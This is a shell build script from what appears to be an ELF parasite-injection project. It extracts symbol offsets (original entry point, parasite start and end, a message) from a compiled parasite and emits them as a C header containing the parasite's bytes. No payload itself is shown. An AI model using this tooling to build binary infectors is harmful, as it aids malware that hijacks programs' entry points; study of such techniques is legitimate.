#!/bin/sh
set -e

BIN="$1"
ELF="$2"

sym() {
    nm "$ELF" | awk -v s="$1" '$3 == s {print "0x" $1; exit}'
}

START=$(sym __parasite_start)
END=$(sym __parasite_end)
HERE_VA=$(sym ATTACK_HERE_VA)
ORIG_ENTRY=$(sym ATTACK_ORIG_ENTRY)
HERE_LABEL=$(sym ATTACK_HERE_LABEL)
MSG=$(sym ATTACK_MSG)

if [ -z "$START" ] || [ -z "$END" ] || [ -z "$HERE_VA" ] \
   || [ -z "$ORIG_ENTRY" ] || [ -z "$HERE_LABEL" ]; then
    echo "gen_blob_header.sh: missing required symbols in $ELF" >&2
    nm "$ELF" >&2
    exit 1
fi

cat <<EOF
// Auto-generated by gen_blob_header.sh — do not edit.
// Regenerated whenever parasite.bin or parasite.elf change.

#ifndef ATTACK_PARASITE_BLOB_H
#define ATTACK_PARASITE_BLOB_H

#include <stdint.h>
#include <stddef.h>

// Offsets are relative to __parasite_start (= byte 0 of the blob).
#define PARASITE_BLOB_SIZE             ((size_t)($END - $START))
#define PARASITE_HERE_VA_QUAD_OFFSET   ((size_t)($HERE_VA - $START))
#define PARASITE_ORIG_ENTRY_QUAD_OFFSET ((size_t)($ORIG_ENTRY - $START))
#define PARASITE_HERE_LABEL_OFFSET     ((size_t)($HERE_LABEL - $START))
#define PARASITE_MSG_OFFSET            ((size_t)($MSG - $START))

static const uint8_t parasite_blob[] = {
EOF

od -An -v -tx1 -w16 "$BIN" | awk '
{
    for (i = 1; i <= NF; i++) {
        printf "    0x%s,", $i
        if (i % 16 == 0) printf "\n"
    }
    if (NF % 16 != 0) printf "\n"
}'

cat <<EOF
};

#endif /* ATTACK_PARASITE_BLOB_H */
EOF